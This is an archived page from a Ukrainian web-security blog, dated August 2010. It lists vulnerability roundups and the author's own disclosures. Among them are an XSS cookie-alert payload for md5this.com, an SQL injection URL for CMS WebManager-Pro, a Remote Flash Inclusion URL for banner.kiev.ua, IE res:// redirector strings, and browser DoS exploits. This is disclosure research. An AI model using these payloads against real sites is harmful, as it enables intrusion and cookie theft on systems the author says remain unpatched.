Архів для категорії 'Уразливості'

Добірка уразливостей

15:01 24.08.2010

В даній добірці уразливості в веб додатках:

  • Safari 3.2.3 (Win32) JavaScript ‘eval’ Remote Denial of Service Exploit (деталі)
  • SQL injection vulnerability in ImpressPages CMS (деталі)
  • SQL injection vulnerability in ImpressPages CMS (деталі)
  • DoS vulnerability in Multicast DNS server Avahi (деталі)
  • GR Board v1.8.6. (theme) Local File Inclusion Vulnerability (деталі)
  • GR Board v1.8.6.1 stab (page.php?theme) Remote File Inclusion Vulnerability (деталі)
  • IBM Lotus Notes 8.5 RSS Widget Privilege Escalation (XSS in local zone) (деталі)
  • XSS vulnerability in Ecomat CMS (деталі)
  • SQL injection vulnerability in Ecomat CMS (деталі)
  • Multiple Vulnerabilities in CMS Made Simple - Bkis (деталі)

Link Injection та Redirector уразливості в Internet Explorer

23:52 23.08.2010

Нещодавно, 20.08.2010, я виявив Link Injection та Redirector (URL Redirector Abuse) уразливості в різних версіях Microsoft Internet Explorer. Так що, як видно з мого дослідження, до Link Injection та Redirector уразливі не тільки веб додатки, але й браузери.

Link Injection (в IE8):

res://ieframe.dll/acr_error.htm#Site,http://site.com

Redirector:

В IE7 та IE8:

res://ieframe.dll/http_404.htm#http://websecurity.com.ua

В IE6, IE7 та IE8:

res://c:\windows\system32\shdoclc.dll/http_404.htm#http://websecurity.com.ua

res://shdoclc.dll/http_404.htm#http://websecurity.com.ua

res://c:\windows\system32\shdoclc.dll/syntax.htm#http://websecurity.com.ua

res://shdoclc.dll/syntax.htm#http://websecurity.com.ua

В даних Redirector уразливостях потрібно буде після переходу по лінці (у всіх зазначених браузерах) натиснути F5 чи клікнути на кнопку Refresh для редирекції на заданий сайт. Тому що браузер змінює адресу в адресному рядку на вказаний URL, але не переходить на нього, тому йому потрібно допомогти :-) .

Уразливі версії Internet Explorer 6 (6.0.2900.2180), Internet Explorer 7 (7.00.5730.13), Internet Explorer 8 (8.00.6001.18702) та попередні версії.

Уразливості на www.md5this.com

15:21 23.08.2010

28.12.2009

У травні, 03.05.2009, я знайшов Cross-Site Scripting та Insufficient Anti-automation уразливості на секюріті проекті http://www.md5this.com. Про що найближчим часом сповіщу адміністрацію проекту.

Детальна інформація про уразливості з’явиться пізніше. Треба дати час адмінам на реакцію з цього приводу.

23.08.2010

XSS:

POST запит на сторінці http://www.md5this.com/crack-it-/index.php
<script>alert(document.cookie)</script>В полі для md5 хеша (якщо правильно ввести капчу).

XSS через GET (з обходом капчі):

Insufficient Anti-automation:

http://www.md5this.com/crack-it-/index.php

Капча на даній сторінці вразлива до MustLive CAPTCHA bypass method. Її можна обійти використовуючи одні і тіж коректні значення mathguard_code і mathguard_answer (одна пара код-відповідь працює тривалий час).

Дані уразливості досі не виправлені.

XSS уразливість в WordPress 3.0.1

23:50 14.08.2010

Нещодавно була оприлюднена Cross-Site Scripting уразливість в WordPress. Уразливі WordPress 3.0.1 та попередні версії.

Використовуючи дану уразливість можна провести XSS атаку на адміна. Але зазначу, що для атаки потрібно знати токен (_wpnonce), призначений для захисту від CSRF атак (який є в WP 2.9.2 та попередніх версіях), тому реально використати дану XSS буде важко.

До речі, під час проекту День багів в WordPress 2 я розповів про уразливість в плагіні WordPress Database Backup, що потенційно може працювати з WP 3.0 та 3.0.1, тому вона також може торкнутися користувачів останньої версії движка.

  • WordPress 3.0.1 - Cross Site Scripting Issue (деталі)

Зазначу, що версії WordPress 2.0.x невразливі, бо в них немає даного функціоналу. Зате, як я перевірив, вразливі версії 2.7 - 2.9.2 (так само як і у випадку версій 3.0 та 3.0.1). Також вразлива WP 2.6.2, але там атаку потрібно робити по іншому (зовсім інший запит), причому можливий тільки POST запит (при тому, що в WP 2.7 і вище можливі як GET, так і POST запити). В WP 2.6.x даний функціонал по іншому реалізований. Додам, що досліджуючи дану дірку я виявив багато інших дірок в цьому функціоналі, про що я напишу окремо ;-) .

Також зазначу, що дослідник який знайшов цю дірку заявив, що атака відбувається через параметер checked[0] в скрипті wp-admin/plugins.php, коли параметер action рівний delete-selected. Як я перевірив, XSS код можна вказувати як в checked[0], так і в checked[1] і т.д., а також в checked[]. До того ж, в WP 2.8 - 2.9.2, 3.0 та 3.0.1 можна вказувати як action рівний delete-selected, так і action2 рівний delete-selected, а в версіях 2.7.х можна використати тільки action.

Добірка уразливостей

15:05 14.08.2010

В даній добірці уразливості в веб додатках:

  • Vulnerability in libneon 0.27 (деталі)
  • SQL injection vulnerability in 360 Web Manager (деталі)
  • New devscripts packages fix remote code execution (деталі)
  • Multiple Vulnerabilities in BigAce - Bkis (деталі)
  • clearsite Remote File Include Vulnerability (деталі)
  • SQL injection in OSCommerce Add-On Visitor Web Stats (деталі)
  • Web Online Games (game.php) Multiple Vulnerabilities (деталі)
  • Ipswitch WS_FTP 12 Professional Remote Format String 0day PoC (деталі)
  • Groone’s Simple Contact Form (abspath) Remote File Inclusion Vulnerability (деталі)
  • SQL injection vulnerability in ImpressPages CMS (деталі)

DoS в Firefox, Internet Explorer, Chrome та Opera через різні протоколи

23:59 13.08.2010

Раніше я розповідав про DoS атаки на різні браузери через різні обробники протоколів. А зараз в якості заверешення даного дослідження я наведу інформацію про DoS атаку через ще 7 протоколів.

Зараз повідомляю про DoS в різних браузерах через протоколи view-source, hcp, irc, snews, skype, skype-plugin і shell. В травні, 26.05.2010, я виявив Denial of Service уразливості в Mozilla Firefox, Internet Explorer, Google Chrome та Opera.

Вони відноситься до типу вибиваючих DoS, блокуючих DoS та DoS через споживання ресурсів. Дані атаки можна провести як з використанням JS, так і без нього (створивши сторінку з великою кількістю iframe).

DoS:

Firefox, IE & Opera DoS Exploit2.html (в Firefox, IE6 та Opera відбувається споживання ресурсів, в IE8 не працює).

IE & Opera DoS Exploit2.html (в IE6 запуск Help and Support Center та споживання ресурсів, в Opera та IE7 споживання ресурсів, в IE8 не працює).

Firefox, IE, Chrome & Opera DoS Exploit8.html (в Firefox блокування та споживання ресурсів, в IE6, IE7 та IE8 (6001) запуск mIRC, блокування та споживання ресурсів, в Chrome блокування, в Opera споживання ресурсів, а в IE8 (7600) зависає). Для атаки потрібен irc-клієнт, такий як mIRC.

Firefox, IE & Opera DoS Exploit3.html (атака подіна до протоколів news та nntp) (в Firefox, IE6, IE7 та IE8 (6001) запуск OE, блокування та споживання ресурсів, в Opera споживання ресурсів, а в IE8 (7600) зависає).

Firefox, IE, Chrome & Opera DoS Exploit9.html (в Firefox блокування та споживання ресурсів, в IE6, IE7 та IE8 (6001) запуск Skype та споживання ресурсів, в Chrome блокування та споживання русурсів, в Opera споживання ресурсів, а в IE8 (7600) зависає та споживає ресурси). Для атаки потрібен Skype.

Firefox, IE, Chrome & Opera DoS Exploit10.html (в Firefox блокування та споживання ресурсів, в IE6, IE7 та IE8 (6001) запуск Skype Extras Manager та споживання ресурсів, в Chrome блокування та споживання русурсів, в Opera споживання ресурсів). Для атаки потрібен Skype.

IE DoS Exploit2.html (в IE6 вилітає, а якщо зробити експлоіт на JS, подібний до вищенаведених експлоітів, то в IE6 так само вилітає, а в IE7 блокування).

Дані експлоіти працюють (кожен по різному) в Mozilla Firefox 3.0.19 (і окрім попередніх версій, вони повинні працювати в 3.5.x та 3.6.x), Internet Explorer 6 (6.0.2900.2180), Internet Explorer 7 (7.00.5730.13), Internet Explorer 8 (8.00.6001.18702 і 8.0.7600.16385), Google Chrome 1.0.154.48 та Opera 9.52.

Нові уразливості на www.banner.kiev.ua

15:24 13.08.2010

22.12.2009

У квітні, 26.04.2009, я знайшов Cross-Site Scripting та Remote Flash Inclusion уразливості на проекті http://www.banner.kiev.ua (банерна мережа UBN). Про що найближчим часом сповіщу адміністрацію проекту.

Раніше я вже писав про численні уразливості на www.banner.kiev.ua.

Як і у випадку попередніх XSS уразливостей, нова XSS пов’язана з тією самою проблемою, про яку я писав в статті XSS уразливості в 8 мільйонах флеш файлах.

Детальна інформація про уразливості з’явиться пізніше. Треба дати час адмінам на реакцію з цього приводу.

13.08.2010

XSS:

Код спрацює при кліку. Це Strictly social XSS.

Remote Flash Inclusion:

В старих версіях флеша, де була менш жорстка політика безпеки, можна було просто включити зовнішню флешку і виконати XSS код (він міг бути виконаний автоматично, або при кліку).

http://www.banner.kiev.ua/s/loader.swf?swf=http://websecurity.com.ua/webtools/url.swf

В нових версіях флеша це неможливо, тому окрім самого віддаленого включення флешки (Remote Flash Inclusion), потрібно вказати також код для виконання у відповідному параметрі флешки loader.swf.

XSS:

Добірка уразливостей

15:07 12.08.2010

В даній добірці уразливості в веб додатках:

  • CoreHTTP web server off-by-one buffer overflow vulnerability (деталі)
  • JV2 Folder Gallery 3.1.1 (popup_slideshow.php) Multiple Vulnerability (деталі)
  • SQL injection vulnerability in Zabbix <= 1.8.1 (деталі)
  • XSS vulnerability in razorCMS (деталі)
  • XSS vulnerability in GetSimple CMS (деталі)
  • XSS vulnerability in RuubikCMS (деталі)
  • SQL injection vulnerability in 360 Web Manager (деталі)
  • XSS vulnerability in 360 Web Manager (деталі)
  • Hewlett-Packard Application Recovery Manager MSG_PROTOCOL Stack Overflow Vulnerability (деталі)
  • HP OpenView Data Protector Application Recovery Manager, Remote Denial (деталі)

Уразливість в CMS WebManager-Pro

15:10 11.08.2010

09.10.2009

У лютому, 13.02.2009, я знайшов SQL Injection уразливість в CMS WebManager-Pro. Це українська CMS. Дану уразливість я виявив на сайті moral.gov.ua, де використовується дана система. Про що найближчим часом повідомлю розробникам.

Детальна інформація про уразливість з’явиться пізніше. Спочатку повідомлю розробникам системи.

11.08.2010

SQL Injection:

http://site/index.php?content_id=-1%20or%20version()=4

Уразливі дві системи CMS WebManager-Pro від двох розробників. Уразливі версії CMS WebManager-Pro v.7.0 (версія від WebManager) та попередні версії, а також CMS WebManager-Pro v.7.4.3 (версія від FGS_Studio) та попередні версії.

Дана уразливість досі не виправлена розробником FGS_Studio (як й інші дірки, про які я повідомляв). Зате WebManager вже випривили дану уразливість в 8.x версіях своєї системи.

Добірка уразливостей

15:18 10.08.2010

В даній добірці уразливості в веб додатках:

  • Oracle Secure Backup observiced.exe Remote Code Execution Vulnerability (деталі)
  • Oracle Updates for Multiple Vulnerabilities (деталі)
  • Oracle Critical Patch Update Advisory - January 2010 (деталі)
  • XSS vulnerability in gpEasy CMS (деталі)
  • SQL injection vulnerability in LiSK CMS (деталі)
  • MKPortal horoscop module Vulnerability (деталі)
  • MKPortal speed connection module Vulnerability (деталі)
  • NaviCopa webserver 3.01 Multiple Vulnerabilities (деталі)
  • Multiple Vulnerabilities in BigAce - Bkis (деталі)
  • Hustoj is HUST ACM OnlineJudge “fckeditor” file upload security issue (деталі)